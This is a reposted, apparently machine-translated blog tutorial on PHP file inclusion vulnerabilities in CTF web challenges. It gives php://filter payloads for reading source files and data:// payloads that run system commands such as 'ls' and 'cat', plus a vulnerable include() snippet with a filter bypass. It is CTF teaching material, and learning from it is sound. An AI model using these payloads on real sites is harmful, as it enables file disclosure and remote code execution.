ctf web file contains vulnerabilities (example)

Others 2021-03-22 12:35:54 views: null

File contains vulnerabilities

php://protocol

php://filter and php://input, php://filter is used to read source code, and php://input is used to execute php code.

One, php://filter

When it is combined with the include function, the php://filter stream will be executed as a php file. So we generally base64 encode it to prevent it from not executing. This leads to arbitrary file reading.
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.php

Example: [ACTF2020 Freshman Competition] Include

Look at the url carefully and find that there is flag.php to
Insert picture description here
judge that this title is a PHP pseudo-protocol issue.
Build a payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

Insert picture description here

base64 decoded
Insert picture description here

例题:[BSidesCF 2020]Had a bad day

The php pseudo-protocol can set a layer of agreement to bypass, read any file, and read flag.php directly

?category=php://filter/read=convert.base64-encode/woofers/resource=flag

二、 php://input

A read-only stream that can access the original data of the request, and execute the data in the post request as PHP code.

http://127.0.0.1/cmd.php?file=php://input

Example: Web_php_include

0x01 source code

First, get the title and we see the following php code displayed on the page

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    
    
    $page=str_replace("php://", "", $page);
}
include($page);
?>

Method 1: This topic uses the strstr() function, this function is case sensitive, so here we can bypass strstr() directly

Insert picture description here

Insert picture description here

View the source code:

Insert picture description here

Method 2: date:// pseudo-protocol execution command

Usage: data://text/plain;base64,xxxx (base64 encoded data)
data://text/plain,<?php system("ls")?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

Insert picture description here

data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

Insert picture description here

0x02 summary:

1. The functions that cause file inclusion vulnerabilities usually include:
include, require, include_once, require_once, highlight_file, show_source, file_get_contents, fopen, file, readline
2. data protocol
usage:
data://text/plain,xxxx(php to be executed Code)
data://text/plain;base64,xxxx (base64 encoded data)
3.php://protocol
php://input, used to execute php code, post request to submit data.

Guess you like

Origin blog.csdn.net/weixin_49298265/article/details/110356100
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com